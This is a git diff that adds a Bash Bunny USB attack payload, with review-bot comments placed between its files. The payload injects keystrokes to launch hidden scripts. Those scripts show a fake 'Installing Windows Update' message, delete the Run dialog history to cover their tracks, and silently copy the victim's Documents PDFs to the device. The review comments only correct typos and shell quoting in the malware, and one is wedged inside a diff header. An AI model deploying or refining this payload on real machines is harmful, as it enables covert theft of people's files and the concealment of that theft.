diff --git a/payloads/library/usb_exfiltrator/d.cmd b/payloads/library/usb_exfiltrator/d.cmd
new file mode 100644
index 0000000..bd36604
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/d.cmd
@@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~d0\i.vbs %~d0\e.cmd
+@exit
\ No newline at end of file
diff --git a/payloads/library/usb_exfiltrator/e.cmd b/payloads/library/usb_exfiltrator/e.cmd
new file mode 100644
index 0000000..e6a59ec
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/e.cmd
@@ -0,0 +1,29 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+set dst=%~d0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+REM Same as above but does not create empty directories
+xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
\ No newline at end of file
diff --git a/payloads/library/usb_exfiltrator/i.vbs b/payloads/library/usb_exfiltrator/i.vbs
new file mode 100644
index 0000000..1ffd3c3
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/i.vbs
@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/usb_exfiltrator/install.sh b/payloads/library/usb_exfiltrator/install.sh
new file mode 100644
index 0000000..b8a2418
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/install.sh
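Review bot: The comment above the `set dst=` line misdescribes the directory name: `REM Creates directory compromised of computer name, date and time` should read `REM Creates directory comprised of computer name, date and time`, since nothing here is being compromised and the sentence reads as a typo. The following REM line is also informal for a file that is meant to be edited by users; `REM %~d0 = drive of this batch file; %COMPUTERNAME%, %date% and %time% are the standard environment values` would say the same thing plainly. The `%~d0` modifier yields the drive letter rather than a full path, so the comment's wording "path to this batch file" is slightly inaccurate as well.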
@@ -0,0 +1,8 @@
+LED R G
+PAYLOADDIR=$(find /root/udisk/payloads/ -name d.cmd -printf '%h\n')
+cd $PAYLOADDIR
+mv d.cmd e.cmd i.vbs /root/udisk/
+sync
+LED R G B 30
+sleep 2
+exit 0
\ No newline at end of file
diff --git a/payloads/library/usb_exfiltrator/payload.txt b/payloads/library/usb_exfiltrator/payload.txt
new file mode 100644
index 0000000..0611c1c
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/payload.txt
@@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Title: USB Exfiltration
+# Author: Hak5Darren
+# Version: 1.0
+# Target: Windows XP SP3+
+# Props: Diggster
+#
+# Executes d.cmd from the root of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies documents to the loot folder on the Bash Bunny.
+#
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'d.cmd')"
+QUACK ENTER
+LED G
diff --git a/payloads/library/usb_exfiltrator/readme.md b/payloads/library/usb_exfiltrator/readme.md
new file mode 100644
index 0000000..8589109
--- /dev/null
+++ b/payloads/library/usb_exfiltrator/readme.md
@@ -0,0 +1,23 @@
+# Exfiltrator for Bash Bunnys
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.
+
+## Configuration
+
+By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking.
+
+## STATUS
+
+| LED | Status |
+| --------==-------- | -------------------------------------------- |
+| Amber | Installing e.cmd d.cmd and i.vbs to USB Disk |
+| White (blinking) | Setup Failed. Target didn't obtain IP |
+| Red | Attack Setup |
+| Green | Attack Complete |
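Review bot: `cd $PAYLOADDIR` on the third line of install.sh is an unquoted expansion whose status is never checked, so when `find` prints nothing the `mv` on the next line runs from an unrelated working directory; the conventional form is `cd "$PAYLOADDIR" || exit 1` (ShellCheck SC2086). The script also has no shebang and no header comment, unlike payload.txt in the same commit, which documents its author and version in a `#` block. A one-line `# Moves the staged d.cmd, e.cmd and i.vbs to the root of the udisk partition, where payload.txt expects them` header would make the two files read consistently.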